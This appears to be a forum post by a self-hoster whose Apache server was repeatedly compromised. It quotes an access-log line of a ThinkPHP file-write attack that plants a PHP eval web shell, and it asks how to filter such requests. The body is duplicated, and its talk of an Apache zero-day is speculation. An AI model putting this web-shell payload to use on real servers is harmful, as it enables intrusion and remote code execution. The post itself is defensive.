I keep seeing query strings like this, some even more convoluted:
All I have is a static html page right now, so I don't know what they're trying to do, but is there maybe a way to execute php directly somehow? It almost looks like that's what they're trying to do or maybe even being successful. Whatever is in the POST might be the payload. Looks like they're using the user agent string as part of the attack as well.
My server got hacked a while back, twice - second time was a brand new install of Debian with nothing else on it just a basic landing page saying sites are coming back. Got hacked overnight as backups were being uploaded to it. Starting to wonder if there is a 0 day in Apache that is not discovered yet. Maybe somehow related to log4j? Ex: could some of that code be used in Apache too even though it's not Java?
Going to let this run for a while to see if it eventually gets hacked again, there's basically no attack surface at this point as I literally just have apache with a basic html page and ssh running. (key pair auth only) I want to try to self host again but it seems there is some kind of sophisticated attack being used against me, considering they were able to hack a brand new box with nothing setup yet. Not sure whether or not that query string is part of the attack or not.
Is there a way to intercept these queries before they end up going to apache? I guess some kind of reverse proxy maybe? I want to look for keywords and just ignore them and automatically ban the IPs that attempt this stuff.
Code:
GET /?s=index/\\think\\template\\driver\\file/write&cacheFile=robots1.php&content=xbshell<?php%20@eval($_POST[admin]);?> HTTP/1.1" 302 687 "[my site]/?s=index/\\think\\template\\driver\\file/write&cacheFile=robots1.php&content=xbshell<?php @eval($_POST[admin]);?>All I have is a static html page right now, so I don't know what they're trying to do, but is there maybe a way to execute php directly somehow? It almost looks like that's what they're trying to do or maybe even being successful. Whatever is in the POST might be the payload. Looks like they're using the user agent string as part of the attack as well.
My server got hacked a while back, twice - second time was a brand new install of Debian with nothing else on it just a basic landing page saying sites are coming back. Got hacked overnight as backups were being uploaded to it. Starting to wonder if there is a 0 day in Apache that is not discovered yet. Maybe somehow related to log4j? Ex: could some of that code be used in Apache too even though it's not Java?
Going to let this run for a while to see if it eventually gets hacked again, there's basically no attack surface at this point as I literally just have apache with a basic html page and ssh running. (key pair auth only) I want to try to self host again but it seems there is some kind of sophisticated attack being used against me, considering they were able to hack a brand new box with nothing setup yet. Not sure whether or not that query string is part of the attack or not.
Is there a way to intercept these queries before they end up going to apache? I guess some kind of reverse proxy maybe? I want to look for keywords and just ignore them and automatically ban the IPs that attempt this stuff.
Facebook
Twitter